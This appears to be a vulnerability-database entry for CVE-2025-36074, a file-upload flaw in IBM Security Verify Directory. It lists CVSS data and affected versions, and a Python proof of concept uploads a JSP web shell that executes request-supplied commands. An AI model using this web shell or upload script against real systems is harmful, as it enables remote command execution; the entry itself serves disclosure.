Security Vulnerability Report
中文
CVE-2025-36074 CVSS 5.5 MEDIUM

CVE-2025-36074

Published: 2026-04-23 00:16:43
Last Modified: 2026-05-13 23:08:38

Description

IBM Security Verify Directory (Container) 10.0.0 through 10.0.0.3 IBM Security Verify Directory could be vulnerable to malicious file upload by not validating file type. A privileged user could upload malicious files into the system that can be sent to victims for performing further attacks against the system.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:ibm:security_verify_directory:*:*:*:*:*:*:*:* - VULNERABLE
10.0.0
10.0.0.1
10.0.0.2
10.0.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # PoC for CVE-2025-36074 - Malicious File Upload # Note: This is a conceptual demonstration based on the vulnerability description. target_url = "https://target-server.com/upload_endpoint" login_url = "https://target-server.com/login" # 1. Authenticate as a privileged user credentials = { "username": "admin", "password": "password" } session = requests.Session() session.post(login_url, data=credentials) # 2. Prepare malicious file malicious_file = {'file': ('exploit.jsp', '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>', 'application/octet-stream')} # 3. Upload the file response = session.post(target_url, files=malicious_file) if response.status_code == 200: print("File uploaded successfully.") else: print("Upload failed.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36074", "sourceIdentifier": "[email protected]", "published": "2026-04-23T00:16:43.093", "lastModified": "2026-05-13T23:08:37.987", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Security Verify Directory (Container) 10.0.0 through 10.0.0.3 IBM Security Verify Directory could be vulnerable to malicious file upload by not validating file type. A privileged user could upload malicious files into the system that can be sent to victims for performing further attacks against the system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:L", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:security_verify_directory:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0", "versionEndIncluding": "10.0.3", "matchCriteriaId": "8B656697-5EF2-4D96-8CB3-1D8D36947ECC"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7268907", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}